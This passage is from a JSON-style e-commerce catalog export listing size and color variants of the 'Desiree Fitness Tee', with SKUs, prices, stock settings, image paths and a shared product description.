quired_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"1527\":{\"sku\":\"WS05-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-XS-Orange\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1528\":{\"sku\":\"WS05-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-XS-Yellow\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1529\":{\"sku\":\"WS05-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-S-Black\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"1530\":{\"sku\":\"WS05-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-S-Orange\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1531\":{\"sku\":\"WS05-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-S-Yellow\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1532\":{\"sku\":\"WS05-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-M-Black\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1533\":{\"sku\":\"WS05-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-M-Orange\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1534\":{\"sku\":\"WS05-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-M-Yellow\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1535\":{\"sku\":\"WS05-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-L-Black\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_